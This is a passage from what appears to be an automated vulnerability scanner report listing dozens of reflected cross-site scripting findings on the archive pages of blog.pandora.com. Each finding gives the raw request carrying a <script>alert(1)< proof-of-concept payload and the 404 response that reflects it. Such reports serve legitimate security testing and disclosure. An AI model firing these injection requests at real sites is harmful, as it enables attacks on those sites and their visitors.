Path: | /pandora/archives/2009/02 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a4a2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4a4a2<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4a4a2<script>alert(1)< ...[SNIP]... |
3.191. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/02 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 714ce<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009714ce<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009714ce<script>alert(1)< ...[SNIP]... |
3.192. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/02 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92265<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0292265<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0292265<script>alert(1)< ...[SNIP]... |
3.193. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/03 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa04<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraefa04<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraefa04<script>alert(1)< ...[SNIP]... |
3.194. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/03 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc94c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbc94c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbc94c<script>alert(1)< ...[SNIP]... |
3.195. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/03 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2a57<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009c2a57<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009c2a57<script>alert(1)< ...[SNIP]... |
3.196. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/03 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61662<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0361662<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0361662<script>alert(1)< ...[SNIP]... |
3.197. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/04 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7af11<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7af11<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7af11<script>alert(1)< ...[SNIP]... |
3.198. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/04 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beaf3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbeaf3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbeaf3<script>alert(1)< ...[SNIP]... |
3.199. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/04 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68bf4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200968bf4<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200968bf4<script>alert(1)< ...[SNIP]... |
3.200. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/04 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7adfa<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/047adfa<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/047adfa<script>alert(1)< ...[SNIP]... |
3.201. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/05 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee40e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee40e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraee40e<script>alert(1)< ...[SNIP]... |
3.202. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/05 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83b92<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives83b92<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives83b92<script>alert(1)< ...[SNIP]... |
3.203. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/05 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b54d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097b54d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 348 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097b54d<script>alert(1)< ...[SNIP]... |
3.204. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/05 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fdb9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/054fdb9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/054fdb9<script>alert(1)< ...[SNIP]... |
3.205. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/06 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ddb1<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5ddb1<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5ddb1<script>alert(1)< ...[SNIP]... |
3.206. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/06 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40560<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives40560<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives40560<script>alert(1)< ...[SNIP]... |
3.207. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/06 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35d6a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200935d6a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200935d6a<script>alert(1)< ...[SNIP]... |
3.208. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/06 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6dc78<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/066dc78<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/066dc78<script>alert(1)< ...[SNIP]... |
3.209. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/07 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea0d3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea0d3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraea0d3<script>alert(1)< ...[SNIP]... |
3.210. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/07 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6355<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese6355<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese6355<script>alert(1)< ...[SNIP]... |
3.211. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/07 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bdd32<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009bdd32<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009bdd32<script>alert(1)< ...[SNIP]... |
3.212. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/07 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b55f0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/07b55f0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/07b55f0<script>alert(1)< ...[SNIP]... |
3.213. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/08 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cddd<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9cddd<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9cddd<script>alert(1)< ...[SNIP]... |
3.214. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/08 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc45<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9fc45<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9fc45<script>alert(1)< ...[SNIP]... |
3.215. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/08 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3275c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20093275c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20093275c<script>alert(1)< ...[SNIP]... |
3.216. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/08 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48254<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0848254<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0848254<script>alert(1)< ...[SNIP]... |
3.217. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/09 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee644<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee644<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraee644<script>alert(1)< ...[SNIP]... |
3.218. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/09 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da5b9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesda5b9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesda5b9<script>alert(1)< ...[SNIP]... |
3.219. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
